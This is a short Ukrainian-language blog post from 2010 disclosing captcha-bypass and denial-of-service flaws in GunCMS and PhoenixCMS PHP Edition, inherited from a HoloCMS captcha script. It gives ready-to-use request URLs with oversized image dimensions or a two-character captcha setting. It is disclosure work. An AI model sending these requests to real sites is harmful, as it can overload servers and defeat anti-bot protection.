Уразливості в GunCMS та PhoenixCMS PHP Edition
23:52 27.03.2010У березні, 17.03.2010, я знайшов Insufficient Anti-automation та Denial of Service уразливості в системах GunCMS та PhoenixCMS PHP Edition. Про що найближчим часом сповіщу розробників.
GunCMS включає в себе HoloCMS 3.1 і відповідно її уразливості. А PhoenixCMS PHP Edition базується на HoloCMS. Дані уразливості наявні в скрипті капчі CaptchaSecurityImages.php, що використовується в даній системі. Про уразливості в CaptchaSecurityImages я вже розповідав.
Insufficient Anti-automation:
В GunCMS:
http://site/path/captcha/CaptchaSecurityImages.php?width=150&height=100&characters=2
В PhoenixCMS PHP Edition:
http://site/captcha/CaptchaSecurityImages.php?width=150&height=100&characters=2
Можливий обхід капчі через напівавтоматизований або автоматизований (з використанням OCR) методи, що були згадані раніше.
DoS:
В GunCMS:
http://site/path/captcha/CaptchaSecurityImages.php?width=1000&height=9000
В PhoenixCMS PHP Edition:
http://site/captcha/CaptchaSecurityImages.php?width=1000&height=9000
Вказавши великі значення width і height можна створити велике навантаження на сервер.
Уразливі всі версії GunCMS.
Уразливі PhoenixCMS PHP Edition 1.0.1 та попередні версії.